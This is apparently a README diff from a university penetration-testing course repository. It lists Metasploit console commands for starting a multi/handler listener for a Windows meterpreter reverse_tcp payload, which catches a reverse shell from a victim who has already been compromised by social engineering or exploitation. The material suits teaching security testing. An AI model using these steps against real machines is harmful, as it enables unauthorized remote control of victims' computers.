Jay-Idrees/UPenn-CyberSecurity-Penetration-Testing/README.md

 Asuming that the payload is already downloaded in the victim machine either via social engineering or via exploitation of services or OS vulnerabilities and establishing a meterpreter session

 - `msfconsole`
+- `use exploit/multi/handler` executes a sequence of commands to target a specific vulnerability
 - `set payload windows/meterpreter/reverse_tcp`
 - `show options`
 - `set LHOST <hacker's ip address>` this ip address must be the same as mentioned in the payload
 - `set LPORT 4444`
 - `show options`
-- `exploit` - This will start listening for the victim's machine which is told to connect to the hacker using reverse shell
+- `exploit` or `run` - This will start listening for the victim's machine which is told to connect to the hacker using reverse shell

 Once a connection is established, the the terminal will now say `meterpreter`